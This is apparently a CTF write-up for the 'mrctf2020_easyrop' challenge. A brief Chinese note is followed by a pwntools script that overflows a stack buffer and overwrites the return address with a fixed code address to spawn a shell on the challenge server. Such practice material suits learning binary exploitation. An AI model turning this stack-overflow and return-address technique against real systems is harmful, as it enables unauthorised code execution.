mrctf2020_easyrop
查看保护
简单题
用hehe和byby这两个函数配合起来rop就行
from pwn import *
from time import sleep
# Target description shared by the pwntools helpers below: 64-bit Linux,
# with verbose tube logging so every send/recv is echoed to the console.
context(arch='amd64', os='linux', log_level='debug')

# Path of the local copy of the challenge binary.
file_name = './z1r0'


def li(x):
    """Print *x* highlighted in orange (ANSI 256-colour index 214)."""
    print('\x1b[01;38;5;214m' + x + '\x1b[0m')


def ll(x):
    """Print *x* highlighted in bold red (ANSI colour index 1)."""
    print('\x1b[01;38;5;1m' + x + '\x1b[0m')


# 1 -> talk to the remote challenge instance, 0 -> spawn the local binary.
# NOTE(review): the flag name reads inverted (``debug`` selects the remote
# side, not the local one) — kept as-is because the value is what it is.
debug = 1
r = remote('node4.buuoj.cn', 26201) if debug else process(file_name)

# Parsed view of the local binary (symbols/sections); loaded regardless of
# which side ``r`` is connected to.
elf = ELF(file_name)
def dbg() -> None:
    """Attach a debugger to the live tube ``r`` (a module-level global).

    ``gdb`` comes from the ``pwn`` star-import; the attach only makes sense
    when ``r`` is a local ``process`` — against a ``remote`` tube there is
    no local process to attach to.
    """
    target = r
    gdb.attach(target)
# Hard-coded code address inside the target binary. The write-up above only
# says the ``hehe``/``byby`` functions are chained; what exactly lives at this
# address is not visible here — confirm in the disassembly.
# NOTE(review): a fixed address like this is only usable when the binary is
# loaded at a fixed base (no PIE); see the protections check at the top of
# the write-up for why that holds for this challenge.
shell = 0x40072A

# Menu choice, then a 0x300-byte filler buffer. The sleep presumably gives
# the target time to reach its read() before the data arrives — TODO confirm
# the menu layout against the binary.
r.sendline('2')
p1 = b'a' * 0x300
sleep(1)
r.send(p1)

# Second menu choice, then 0x12 bytes of filler followed by ``shell`` packed
# as a little-endian 64-bit value. The 0x12 offset is specific to this
# binary's stack layout — confirm in the disassembly.
# NOTE(review): the menu choices are sent as ``str`` ('2', '7') while the
# payloads are ``bytes``; newer pwntools releases warn on, or may reject,
# str data — check against the installed version and prefer bytes throughout.
r.sendline('7')
sleep(1)
p2 = b'a' * 0x12 + p64(shell)
r.send(p2)

# Hand the tube over to the user for interactive use.
r.interactive()